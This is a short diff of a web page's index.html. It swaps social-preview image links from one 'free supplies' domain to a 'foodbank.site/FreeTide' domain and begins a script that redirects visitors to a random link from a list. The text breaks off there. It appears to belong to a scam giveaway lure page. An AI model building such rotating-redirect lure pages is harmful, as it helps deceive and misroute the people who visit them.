--- a/index.html
+++ b/index.html
@@ -9,12 +9,12 @@
 <meta property="og:title" content="	Apply Now"/>
 <meta property="og:description" content=""/>
 <meta property="og:type" content="website"/>
-<meta property="og:image" content="https://freesupplies.shop/0.jpg"/>
+<meta property="og:image" content="https://foodbank.site/FreeTide/0.jpg"/>
 <meta property="og:locale" content="en_IE"/>
 <meta name="twitter:card" content="summary"/>
 <meta name="twitter:title" content="Apply Now"/>
 <meta name="twitter:description" content=""/>
-<meta name="twitter:image" content="https://freesupplies.shop/0.jpg"/>
+<meta name="twitter:image" content="https://foodbank.site/FreeTide/0.jpg"/>
         <script type="text/javascript" src="https://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=eCUvpKSBuLQGLGDSiHD0_HXMwYcg5TMO3JBeGi9oEH19WUQho0RC2GyYmYYJuHCA-KoMzbRlnFzHQMMUdVr8NDKISlqKynviG37UV8QEa6kbgWP-h35d9vULhlc4ek920CM9xbOjqfE2IOPLRpCGV95dtl7I-ebeMwW-nnXx74la57agihX2igZeTo4NXcDZVl8sPbd2XETtetrGyq7Q1g" charset="UTF-8"></script><script>
     // Function to redirect to a random link from the provided array
     function redirectToRandomLink(links) {
